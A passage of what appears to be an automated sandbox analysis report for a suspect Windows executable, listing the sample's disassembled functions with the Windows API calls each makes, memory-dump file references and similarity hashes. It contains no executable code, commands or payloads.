                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3539004672-0
                                                                                                • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                                                • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                                                Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                                • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 327565842-0
                                                                                                • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                                                • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                                                Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                                                • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: PrivateProfile$SectionWrite$String
                                                                                                • String ID:
                                                                                                • API String ID: 2832842796-0
                                                                                                • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                                                • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                                • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                                                Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Enum$CloseDeleteOpen
                                                                                                • String ID:
                                                                                                • API String ID: 2095303065-0
                                                                                                • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                                                • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                                                Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: RectWindow
                                                                                                • String ID:
                                                                                                • API String ID: 861336768-0
                                                                                                • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                                                • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                                                Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32 ref: 00449598
                                                                                                  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                                                • _wcslen.LIBCMT ref: 0044960D
                                                                                                • _wcslen.LIBCMT ref: 0044961A
                                                                                                • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$_wcslen$_wcspbrk
                                                                                                • String ID:
                                                                                                • API String ID: 1856069659-0
                                                                                                • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                                                • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                                                Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCursorPos.USER32(?), ref: 004478E2
                                                                                                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                                • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                                • TrackPopupMenuEx.USER32(00956420,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CursorMenuPopupTrack$Proc
                                                                                                • String ID:
                                                                                                • API String ID: 1300944170-0
                                                                                                • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                                                • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                                                Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                                • GetCursorPos.USER32(?), ref: 004479D7
                                                                                                • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                                • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                                • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1822080540-0
                                                                                                • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                                                • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                                                Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                • String ID:
                                                                                                • API String ID: 659298297-0
                                                                                                • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                                                • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                                                Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                  • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                                  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                                  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                                  • Part of subcall function 00440D98: SendMessageW.USER32(00951BD8,000000F1,00000000,00000000), ref: 00440E6E
                                                                                                  • Part of subcall function 00440D98: SendMessageW.USER32(00951BD8,000000F1,00000001,00000000), ref: 00440E9A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$EnableMessageSend$LongShow
                                                                                                • String ID:
                                                                                                • API String ID: 142311417-0
                                                                                                • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                                                • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                                                Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                                                • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                                                Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsWindowVisible.USER32(?), ref: 00445879
                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                                                • _wcslen.LIBCMT ref: 004458FB
                                                                                                • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                • String ID:
                                                                                                • API String ID: 3087257052-0
                                                                                                • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                                                • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                                                • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                                                • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                                                Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                                                • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                • String ID:
                                                                                                • API String ID: 245547762-0
                                                                                                • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                                                • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                                                Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                • BeginPath.GDI32(?), ref: 0044723D
                                                                                                • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
